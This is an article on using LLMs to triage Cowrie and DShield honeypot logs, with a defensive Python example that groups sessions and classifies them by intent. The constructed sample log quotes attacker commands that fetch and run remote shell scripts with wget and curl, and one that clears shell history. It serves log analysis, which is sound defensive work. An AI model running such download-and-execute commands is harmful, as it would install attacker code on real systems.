Optimizing Honeypot Log Analysis Using AI and LLM Orchestration
Analysis of AI-Assisted Telemetry Filtering
Threat intelligence teams frequently struggle with the sheer volume of telemetry generated by internet-facing sensors. Low-interaction honeypots, while valuable for identifying broad trends, often produce far more noise than signal, and separating the two requires significant manual effort. According to research published by the SANS Internet Storm Center (ISC), Large Language Models (LLMs) can serve as a force multiplier in categorizing this data, specifically when dealing with Cowrie and DShield sensor logs.
The primary challenge in honeypot management is not collecting data but extracting actionable intelligence from thousands of daily connection attempts. Most of this traffic is automated ‘noise’: credential stuffing, mass scanning for known vulnerabilities, and script-kiddie activity. AI assistance provides a mechanism to rapidly distinguish these automated baseline activities from more targeted, human-driven interactions.
Technical Implementation of Cowrie Log Parsing
Cowrie is a medium-interaction SSH and Telnet honeypot designed to log brute force attacks and shell interaction. When integrated with a DShield sensor, it captures a wealth of JSON-formatted log data. The AI-driven approach involves feeding structured logs into an LLM with specific system prompts designed to categorize the activity based on intent and sophistication.
During the research period, the analyst utilized the SANS.edu BACS program infrastructure to monitor ingress traffic. The AI was tasked with identifying:
- Automated Brute Force: Repeated login attempts using common dictionaries with no post-authentication interaction.
- Scripted Exploitation: Automated execution of specific commands (e.g., wget or curl) to download malware binaries or miners immediately upon successful login.
- Human-in-the-Loop Interaction: Unusual commands, exploratory directory traversal, or attempts to obfuscate activity that suggest a manual operator is interacting with the shell.
By automating the initial triage of these logs, analysts can prioritize the investigation of ‘human-like’ sessions, which often yield more valuable indicators of compromise (IOCs) or novel TTPs (Tactics, Techniques, and Procedures).
Challenges: Hallucinations and Prompt Engineering
While AI enhances efficiency, it introduces risks regarding data integrity. The SANS ISC report highlights the occurrence of ‘hallucinations,’ where the LLM may misinterpret hex-encoded payloads or invent connections between unrelated events. To mitigate this, prompt engineering must be rigorous. A ‘chain-of-thought’ prompting strategy—where the AI is instructed to explain its reasoning step-by-step before providing a final categorization—significantly improves the accuracy of the output.
Furthermore, the analyst found that context is vital. Providing the AI with a baseline of ‘normal’ malicious traffic allows it to better identify anomalies. For instance, if a sensor typically sees 5,000 attempts to download a Mirai variant daily, the AI should be tuned to alert only when it detects a deviation from that specific pattern, such as a different persistence mechanism or a novel evasion technique.
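The triage stage that precedes the LLM, as an added example that is not code from the ISC research or the Cowrie project: it groups Cowrie-style JSON events by session, assigns each session one of the three categories listed above, and forwards only human-like sessions and scripted downloads whose source URL is absent from a known-noise baseline. The log lines, the baseline URL set and the function names are constructed for illustration.

```python
import json
import re
from collections import defaultdict
# Constructed Cowrie-style events (sample data, not a real capture); eventid/session/src_ip/input are Cowrie's field names.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","session":"a1","src_ip":"203.0.113.5","username":"root","password":"123456"}
{"eventid":"cowrie.login.success","session":"b2","src_ip":"198.51.100.7","username":"root","password":"root"}
{"eventid":"cowrie.command.input","session":"b2","src_ip":"198.51.100.7","input":"cd /tmp; wget http://203.0.113.200/bot.sh; sh bot.sh"}
{"eventid":"cowrie.login.success","session":"c3","src_ip":"192.0.2.9","username":"admin","password":"admin"}
{"eventid":"cowrie.command.input","session":"c3","src_ip":"192.0.2.9","input":"uname -a"}
{"eventid":"cowrie.command.input","session":"c3","src_ip":"192.0.2.9","input":"history -c"}
{"eventid":"cowrie.login.success","session":"d4","src_ip":"198.51.100.8","username":"pi","password":"raspberry"}
{"eventid":"cowrie.command.input","session":"d4","src_ip":"198.51.100.8","input":"curl -O http://203.0.113.201/new.sh; sh new.sh"}
"""
# Constructed baseline: download sources this sensor already sees every day (the known noise).
BASELINE_URLS = {"http://203.0.113.200/bot.sh"}
URL_RE = re.compile(r"https?://[^\s;|&]+")  # stop at shell separators, not only whitespace

def group_sessions(log_text):
    # Fold line-delimited JSON events into one record per Cowrie session id.
    sessions = defaultdict(lambda: {"authenticated": False, "commands": []})
    for line in filter(None, log_text.splitlines()):
        ev = json.loads(line)
        rec = sessions[ev["session"]]
        if ev["eventid"] == "cowrie.login.success":
            rec["authenticated"] = True
        elif ev["eventid"] == "cowrie.command.input":
            rec["commands"].append(ev["input"])
    return dict(sessions)

def classify(rec):
    # Coarse intent bucket using the three categories the article describes.
    if not rec["authenticated"] or not rec["commands"]:
        return "automated_brute_force"          # no post-auth interaction at all
    if re.search(r"\b(wget|curl)\b", rec["commands"][0]):
        return "scripted_exploitation"          # fetches a payload immediately on login
    return "human_in_the_loop"                  # exploratory or anti-forensic commands

def select_for_llm(log_text, baseline_urls=BASELINE_URLS):
    # Forward every human-like session, plus scripted downloads whose URL deviates from the baseline.
    picked = {}
    for sid, rec in group_sessions(log_text).items():
        cat = classify(rec)
        if cat == "human_in_the_loop":
            picked[sid] = cat
        elif cat == "scripted_exploitation":
            if not set(URL_RE.findall(" ".join(rec["commands"]))) <= baseline_urls:
                picked[sid] = cat               # at least one unseen download source
    return picked
```

With the constructed sample, session b2 is suppressed as baseline noise while c3 (interactive commands) and d4 (novel download URL) are handed to the LLM.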
Recommendations for Security Teams
For organizations looking to implement AI-assisted log analysis, several strategic steps should be prioritized:
- Standardize Data Input: Ensure all honeypot telemetry is converted into a consistent JSON format before being processed. This reduces parsing errors within the LLM.
- Validation Loops: Implement a ‘Human-in-the-Loop’ (HITL) verification process for any activity flagged as ‘high-sophistication’ by the AI to confirm it is not a false positive or an LLM hallucination.
- Focus on Post-Auth Interaction: Configure honeypots to allow limited shell interaction. The most valuable intelligence comes from what an attacker does after they think they have gained access, rather than the initial brute-force attempt.
- Iterative Prompt Refinement: Regularly update the system prompts used for categorization to account for new trends in malware delivery and command-and-control (C2) communication styles.
In conclusion, while AI cannot replace the intuition of a senior threat analyst, it provides a critical layer of automated triage that makes large-scale honeypot operations sustainable for smaller security teams.